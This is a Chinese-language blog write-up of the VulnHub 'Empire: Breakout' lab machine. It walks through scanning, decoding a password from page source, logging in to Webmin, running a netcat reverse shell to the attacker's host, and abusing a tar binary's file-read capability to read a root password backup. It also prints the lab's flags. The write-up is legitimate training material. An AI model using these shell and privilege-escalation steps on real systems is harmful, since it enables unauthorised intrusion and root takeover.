<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-128.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16.png">
  <link rel="mask-icon" href="/images/favicon-128.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhaochoudecat.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Breakout靶机链接：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;empire-breakout,751&#x2F; 1. 信息收集1.1 主机发现12arp-scan -l# 192.168.3.71  1.2 端口扫描1nmap -p- -sV -O 192.168.3.71     端口 服务 版本    80 HTTP Apache httpd 2.4.51 (Debian)">
<meta property="og:type" content="article">
<meta property="og:title" content="Breakout">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/05/04/%E9%9D%B6%E6%9C%BA/vulnhub/Breakout/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="Breakout靶机链接：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;empire-breakout,751&#x2F; 1. 信息收集1.1 主机发现12arp-scan -l# 192.168.3.71  1.2 端口扫描1nmap -p- -sV -O 192.168.3.71     端口 服务 版本    80 HTTP Apache httpd 2.4.51 (Debian)">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/file-20260504232439418.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/file-20260504234711652.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/file-20260504234921413.png">
<meta property="article:published_time" content="2026-05-03T16:00:00.000Z">
<meta property="article:modified_time" content="2026-05-04T16:45:54.500Z">
<meta property="article:author" content="zhaochoudecat">
<meta property="article:tag" content="Vulnhub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhaochoudecat.github.io/assets/file-20260504232439418.png">

<link rel="canonical" href="https://zhaochoudecat.github.io/2026/05/04/%E9%9D%B6%E6%9C%BA/vulnhub/Breakout/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Breakout | zhaochoudecat</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zhaochoudecat</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zhaochoudecat.github.io/2026/05/04/%E9%9D%B6%E6%9C%BA/vulnhub/Breakout/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/saber.jpg">
      <meta itemprop="name" content="zhaochoudecat">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhaochoudecat">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Breakout
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-05-04 00:00:00" itemprop="dateCreated datePublished" datetime="2026-05-04T00:00:00+08:00">2026-05-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2026-05-05 00:45:54" itemprop="dateModified" datetime="2026-05-05T00:45:54+08:00">2026-05-05</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E6%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶机</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E6%9C%BA/vulnhub/" itemprop="url" rel="index"><span itemprop="name">vulnhub</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Breakout"><a href="#Breakout" class="headerlink" title="Breakout"></a>Breakout</h1><p>靶机链接：<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/empire-breakout,751/">https://www.vulnhub.com/entry/empire-breakout,751/</a></p>
<h2 id="1-信息收集"><a href="#1-信息收集" class="headerlink" title="1. 信息收集"></a>1. 信息收集</h2><h3 id="1-1-主机发现"><a href="#1-1-主机发现" class="headerlink" title="1.1 主机发现"></a>1.1 主机发现</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l</span><br><span class="line"><span class="comment"># 192.168.3.71</span></span><br></pre></td></tr></table></figure>

<h3 id="1-2-端口扫描"><a href="#1-2-端口扫描" class="headerlink" title="1.2 端口扫描"></a>1.2 端口扫描</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -p- -sV -O 192.168.3.71</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>端口</th>
<th>服务</th>
<th>版本</th>
</tr>
</thead>
<tbody><tr>
<td>80</td>
<td>HTTP</td>
<td>Apache httpd 2.4.51 (Debian)</td>
</tr>
<tr>
<td>139&#x2F;445</td>
<td>Samba</td>
<td>smbd 4</td>
</tr>
<tr>
<td>10000</td>
<td>HTTP</td>
<td>MiniServ 1.981 (Webmin)</td>
</tr>
<tr>
<td>20000</td>
<td>HTTP</td>
<td>MiniServ 1.830 (Webmin)</td>
</tr>
</tbody></table>
<h3 id="1-3-源码审计"><a href="#1-3-源码审计" class="headerlink" title="1.3 源码审计"></a>1.3 源码审计</h3><p>访问 80 端口，查看网页源代码，发现一段 Brainfuck 编码，解码后得到密码：</p>
<p><img src="/assets/file-20260504232439418.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.2uqPEfj3D&lt;P&#x27;a-3</span><br></pre></td></tr></table></figure>

<h3 id="1-4-Samba-枚举"><a href="#1-4-Samba-枚举" class="headerlink" title="1.4 Samba 枚举"></a>1.4 Samba 枚举</h3><blockquote>
<p><strong>enum4linux</strong> 是一款基于 Perl 的 SMB&#x2F;RPC 信息收集脚本，底层封装了 smbclient、rpcclient、nmblookup、net 等工具，用于批量枚举 Windows&#x2F;Samba 主机的用户、共享、组、密码策略等信息。</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">enum4linux -a 192.168.3.71</span><br></pre></td></tr></table></figure>

<p>关键输出：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">S-1-22-1-1000 Unix User\cyber (Local User)  ← 用户名</span><br></pre></td></tr></table></figure>

<h2 id="2-获取初始-Shell"><a href="#2-获取初始-Shell" class="headerlink" title="2. 获取初始 Shell"></a>2. 获取初始 Shell</h2><h3 id="2-1-Webmin-登录"><a href="#2-1-Webmin-登录" class="headerlink" title="2.1 Webmin 登录"></a>2.1 Webmin 登录</h3><p>使用用户名 <code>cyber</code> + 解码得到的密码 <code>.2uqPEfj3D&lt;P&#39;a-3</code>，成功登录 20000 端口的 Webmin。</p>
<p><img src="/assets/file-20260504234711652.png"></p>
<h3 id="2-2-反弹-Shell"><a href="#2-2-反弹-Shell" class="headerlink" title="2.2 反弹 Shell"></a>2.2 反弹 Shell</h3><p>Webmin 左下角有 Shell 图标，点击进入，即可查看 user.txt：</p>
<p><img src="/assets/file-20260504234921413.png"></p>
<p>然后执行反弹 Shell：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Kali 攻击机监听</span></span><br><span class="line">nc -lvnp 1111</span><br><span class="line"></span><br><span class="line"><span class="comment"># 目标机执行</span></span><br><span class="line">nc 192.168.3.72 1111 -e /bin/bash</span><br></pre></td></tr></table></figure>

<h3 id="2-3-升级为交互式-Shell"><a href="#2-3-升级为交互式-Shell" class="headerlink" title="2.3 升级为交互式 Shell"></a>2.3 升级为交互式 Shell</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">script /dev/null -c bash</span><br><span class="line">Ctrl+Z</span><br><span class="line"><span class="built_in">stty</span> raw -<span class="built_in">echo</span>; <span class="built_in">fg</span></span><br><span class="line">reset xterm</span><br><span class="line"><span class="built_in">export</span> TERM=xterm</span><br><span class="line"><span class="built_in">export</span> SHELL=/bin/bash</span><br><span class="line"><span class="built_in">stty</span> rows 24 columns 80</span><br></pre></td></tr></table></figure>

<p>拿到 user.txt：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">3mp!r3&#123;You_Manage_To_Break_To_My_Secure_Access&#125;</span><br></pre></td></tr></table></figure>

<h2 id="3-提权"><a href="#3-提权" class="headerlink" title="3. 提权"></a>3. 提权</h2><h3 id="3-1-信息探测"><a href="#3-1-信息探测" class="headerlink" title="3.1 信息探测"></a>3.1 信息探测</h3><p>查看 home 目录，发现一个 <code>tar</code> 可执行文件。检查其 Capability：</p>
<blockquote>
<p><strong>Linux Capabilities</strong> 将 root 的超级权限拆分为细粒度特权。<code>getcap</code> 用于查看二进制文件被授予了哪些特权，拥有对应 capability 的进程无需 root 即可执行特权操作。</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cyber@breakout:~$ <span class="built_in">ls</span></span><br><span class="line">tar  user.txt</span><br><span class="line">cyber@breakout:~$ <span class="built_in">getcap</span> tar</span><br><span class="line">tar cap_dac_read_search=ep</span><br></pre></td></tr></table></figure>

<p><code>cap_dac_read_search=ep</code> 允许该程序<strong>绕过文件读权限检查</strong>，可以读取系统上任意文件。</p>
<h3 id="3-2-读取备份密码"><a href="#3-2-读取备份密码" class="headerlink" title="3.2 读取备份密码"></a>3.2 读取备份密码</h3><p>发现 <code>/var/backups/.old_pass.bak</code> 仅 root 可读：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cyber@breakout:/var/backups$ <span class="built_in">ls</span> -la</span><br><span class="line">-rw-------  1 root root  17 Oct 20  2021 .old_pass.bak</span><br></pre></td></tr></table></figure>

<p>利用 tar 的 capability 打包并解压，绕过权限限制：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">./tar -cvf pass.tar /var/backups/.old_pass.bak</span><br><span class="line">./tar -xvf pass.tar</span><br><span class="line"><span class="built_in">cat</span> var/backups/.old_pass.bak</span><br><span class="line"><span class="comment"># Ts&amp;4&amp;YurgtRX(=~h</span></span><br></pre></td></tr></table></figure>

<h3 id="3-3-切换到-root"><a href="#3-3-切换到-root" class="headerlink" title="3.3 切换到 root"></a>3.3 切换到 root</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cyber@breakout:~$ su -</span><br><span class="line">Password: Ts&amp;4&amp;YurgtRX(=~h</span><br><span class="line"></span><br><span class="line">root@breakout:~# <span class="built_in">id</span></span><br><span class="line">uid=0(root) gid=0(root) <span class="built_in">groups</span>=0(root)</span><br><span class="line">root@breakout:~# <span class="built_in">cat</span> rOOt.txt</span><br><span class="line">3mp!r3&#123;You_Manage_To_BreakOut_From_My_System_Congratulation&#125;</span><br></pre></td></tr></table></figure>

<h2 id="4-Flag-汇总"><a href="#4-Flag-汇总" class="headerlink" title="4. Flag 汇总"></a>4. Flag 汇总</h2><table>
<thead>
<tr>
<th>Flag</th>
<th>内容</th>
</tr>
</thead>
<tbody><tr>
<td>user.txt</td>
<td><code>3mp!r3{You_Manage_To_Break_To_My_Secure_Access}</code></td>
</tr>
<tr>
<td>root.txt</td>
<td><code>3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}</code></td>
</tr>
</tbody></table>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Vulnhub/" rel="tag"># Vulnhub</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/05/03/%E4%BF%AE%E6%94%B9%E5%86%85%E5%AE%B9-2026-05-03/" rel="prev" title="Obsidian + Hexo 修复记录">
      <i class="fa fa-chevron-left"></i> Obsidian + Hexo 修复记录
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Breakout"><span class="nav-number">1.</span> <span class="nav-text">Breakout</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.1.</span> <span class="nav-text">1. 信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="nav-number">1.1.1.</span> <span class="nav-text">1.1 主机发现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="nav-number">1.1.2.</span> <span class="nav-text">1.2 端口扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-%E6%BA%90%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="nav-number">1.1.3.</span> <span class="nav-text">1.3 源码审计</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-4-Samba-%E6%9E%9A%E4%B8%BE"><span class="nav-number">1.1.4.</span> <span class="nav-text">1.4 Samba 枚举</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E8%8E%B7%E5%8F%96%E5%88%9D%E5%A7%8B-Shell"><span class="nav-number">1.2.</span> <span class="nav-text">2. 获取初始 Shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-Webmin-%E7%99%BB%E5%BD%95"><span class="nav-number">1.2.1.</span> <span class="nav-text">2.1 Webmin 登录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-%E5%8F%8D%E5%BC%B9-Shell"><span class="nav-number">1.2.2.</span> <span class="nav-text">2.2 反弹 Shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-%E5%8D%87%E7%BA%A7%E4%B8%BA%E4%BA%A4%E4%BA%92%E5%BC%8F-Shell"><span class="nav-number">1.2.3.</span> <span class="nav-text">2.3 升级为交互式 Shell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E6%8F%90%E6%9D%83"><span class="nav-number">1.3.</span> <span class="nav-text">3. 提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-%E4%BF%A1%E6%81%AF%E6%8E%A2%E6%B5%8B"><span class="nav-number">1.3.1.</span> <span class="nav-text">3.1 信息探测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-%E8%AF%BB%E5%8F%96%E5%A4%87%E4%BB%BD%E5%AF%86%E7%A0%81"><span class="nav-number">1.3.2.</span> <span class="nav-text">3.2 读取备份密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-3-%E5%88%87%E6%8D%A2%E5%88%B0-root"><span class="nav-number">1.3.3.</span> <span class="nav-text">3.3 切换到 root</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-Flag-%E6%B1%87%E6%80%BB"><span class="nav-number">1.4.</span> <span class="nav-text">4. Flag 汇总</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zhaochoudecat"
      src="/images/saber.jpg">
  <p class="site-author-name" itemprop="name">zhaochoudecat</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


<div class="saber-gallery motion-element">
  <div class="saber-gallery-container" id="saberGallery">
    <div class="saber-gallery-track">
      <img class="saber-gallery-img" src="/images/blue_saber.png" alt="Blue Saber" data-index="0">
      <img class="saber-gallery-img" src="/images/daily_saber.png" alt="Daily Saber" data-index="1">
      <img class="saber-gallery-img" src="/images/dark_saber.png" alt="Dark Saber" data-index="2">
    </div>
    <button class="saber-gallery-arrow saber-gallery-prev" id="saberPrev" aria-label="上一张">
      <i class="fa fa-chevron-left"></i>
    </button>
    <button class="saber-gallery-arrow saber-gallery-next" id="saberNext" aria-label="下一张">
      <i class="fa fa-chevron-right"></i>
    </button>
    <div class="saber-gallery-dots">
      <span class="saber-gallery-dot active"></span>
      <span class="saber-gallery-dot"></span>
      <span class="saber-gallery-dot"></span>
    </div>
  </div>
</div>

<div class="saber-lightbox" id="saberLightbox">
  <div class="saber-lightbox-overlay"></div>
  <button class="saber-lightbox-close" id="saberLightboxClose" aria-label="关闭">
    <i class="fa fa-times"></i>
  </button>
  <button class="saber-lightbox-arrow saber-lightbox-prev" id="saberLightboxPrev" aria-label="上一张">
    <i class="fa fa-chevron-left"></i>
  </button>
  <button class="saber-lightbox-arrow saber-lightbox-next" id="saberLightboxNext" aria-label="下一张">
    <i class="fa fa-chevron-right"></i>
  </button>
  <div class="saber-lightbox-content">
    <img class="saber-lightbox-img" id="saberLightboxImg" src="" alt="">
  </div>
  <div class="saber-lightbox-counter" id="saberLightboxCounter"></div>
</div>

<style>
.saber-gallery {
  margin-top: 15px;
  text-align: center;
}
.saber-gallery-container {
  position: relative;
  width: 100%;
  height: 280px;
  overflow: hidden;
  border-radius: 8px;
  cursor: pointer;
  user-select: none;
  -webkit-user-select: none;
}
.saber-gallery-container:active {
  cursor: pointer;
}
.saber-gallery-track {
  display: flex;
  height: 100%;
  transition: transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  will-change: transform;
}
.saber-gallery-img {
  flex-shrink: 0;
  width: 100%;
  height: 100%;
  object-fit: contain;
  object-position: center;
  pointer-events: none;
}
.saber-gallery-arrow {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  width: 32px;
  height: 32px;
  border: none;
  border-radius: 50%;
  background: rgba(0, 0, 0, 0.4);
  color: #fff;
  font-size: 14px;
  cursor: pointer;
  opacity: 0;
  transition: opacity 0.3s ease, background 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
  z-index: 2;
}
.saber-gallery-container:hover .saber-gallery-arrow {
  opacity: 1;
}
.saber-gallery-arrow:hover {
  background: rgba(0, 0, 0, 0.7);
}
.saber-gallery-arrow.disabled {
  opacity: 0.2 !important;
  cursor: not-allowed;
}
.saber-gallery-prev {
  left: 8px;
}
.saber-gallery-next {
  right: 8px;
}
.saber-gallery-dots {
  position: absolute;
  bottom: 10px;
  left: 50%;
  transform: translateX(-50%);
  display: flex;
  gap: 6px;
  z-index: 2;
}
.saber-gallery-dot {
  width: 6px;
  height: 6px;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.5);
  transition: background 0.3s ease, transform 0.3s ease;
  cursor: pointer;
}
.saber-gallery-dot.active {
  background: rgba(255, 255, 255, 0.95);
  transform: scale(1.3);
}

/* Lightbox Styles */
.saber-lightbox {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: 9999;
  display: none;
  opacity: 0;
  transition: opacity 0.3s ease;
}
.saber-lightbox.active {
  display: flex;
  opacity: 1;
}
.saber-lightbox-overlay {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.92);
  cursor: pointer;
}
.saber-lightbox-content {
  position: relative;
  z-index: 2;
  margin: auto;
  max-width: 90vw;
  max-height: 90vh;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-img {
  max-width: 100%;
  max-height: 90vh;
  object-fit: contain;
  border-radius: 4px;
  transform: scale(0.8);
  transition: transform 0.3s cubic-bezier(0.25, 0.46, 0.45, 0.94);
}
.saber-lightbox.active .saber-lightbox-img {
  transform: scale(1);
}
.saber-lightbox-close {
  position: absolute;
  top: 20px;
  right: 30px;
  width: 40px;
  height: 40px;
  border: none;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.15);
  color: #fff;
  font-size: 18px;
  cursor: pointer;
  z-index: 3;
  transition: background 0.3s ease, transform 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-close:hover {
  background: rgba(255, 255, 255, 0.3);
  transform: rotate(90deg);
}
.saber-lightbox-arrow {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  width: 50px;
  height: 50px;
  border: none;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.15);
  color: #fff;
  font-size: 20px;
  cursor: pointer;
  z-index: 3;
  transition: background 0.3s ease, opacity 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-arrow:hover {
  background: rgba(255, 255, 255, 0.3);
}
.saber-lightbox-arrow.disabled {
  opacity: 0.2;
  cursor: not-allowed;
}
.saber-lightbox-prev {
  left: 20px;
}
.saber-lightbox-next {
  right: 20px;
}
.saber-lightbox-counter {
  position: absolute;
  bottom: 20px;
  left: 50%;
  transform: translateX(-50%);
  color: rgba(255, 255, 255, 0.8);
  font-size: 14px;
  z-index: 3;
  letter-spacing: 2px;
}

@media (max-width: 768px) {
  .saber-lightbox-arrow {
    width: 40px;
    height: 40px;
    font-size: 16px;
  }
  .saber-lightbox-prev {
    left: 10px;
  }
  .saber-lightbox-next {
    right: 10px;
  }
  .saber-lightbox-close {
    top: 10px;
    right: 15px;
    width: 36px;
    height: 36px;
    font-size: 16px;
  }
}
</style>

<script>
(function() {
  // Gallery Logic
  var container = document.getElementById('saberGallery');
  var track = container.querySelector('.saber-gallery-track');
  var images = container.querySelectorAll('.saber-gallery-img');
  var dots = container.querySelectorAll('.saber-gallery-dot');
  var prevBtn = document.getElementById('saberPrev');
  var nextBtn = document.getElementById('saberNext');
  var current = 0;
  var total = images.length;
  var autoInterval = 15000;
  var timer = null;

  function goTo(index) {
    if (index < 0) index = 0;
    if (index >= total) index = total - 1;
    current = index;
    track.style.transform = 'translateX(-' + (current * 100) + '%)';
    dots.forEach(function(dot, i) {
      dot.classList.toggle('active', i === current);
    });
    updateArrows();
  }

  function updateArrows() {
    prevBtn.classList.toggle('disabled', current === 0);
    nextBtn.classList.toggle('disabled', current === total - 1);
  }

  function next() {
    if (current < total - 1) {
      goTo(current + 1);
    }
  }

  function prev() {
    if (current > 0) {
      goTo(current - 1);
    }
  }

  function startAuto() {
    timer = setInterval(function() {
      if (current < total - 1) {
        goTo(current + 1);
      } else {
        goTo(0);
      }
    }, autoInterval);
  }

  function stopAuto() {
    clearInterval(timer);
  }

  prevBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    stopAuto();
    prev();
    startAuto();
  });

  nextBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    stopAuto();
    next();
    startAuto();
  });

  dots.forEach(function(dot, i) {
    dot.addEventListener('click', function(e) {
      e.stopPropagation();
      stopAuto();
      goTo(i);
      startAuto();
    });
  });

  // Touch swipe support
  var startX = 0;
  var startY = 0;
  var isDragging = false;
  var currentTranslate = 0;
  var prevTranslate = 0;

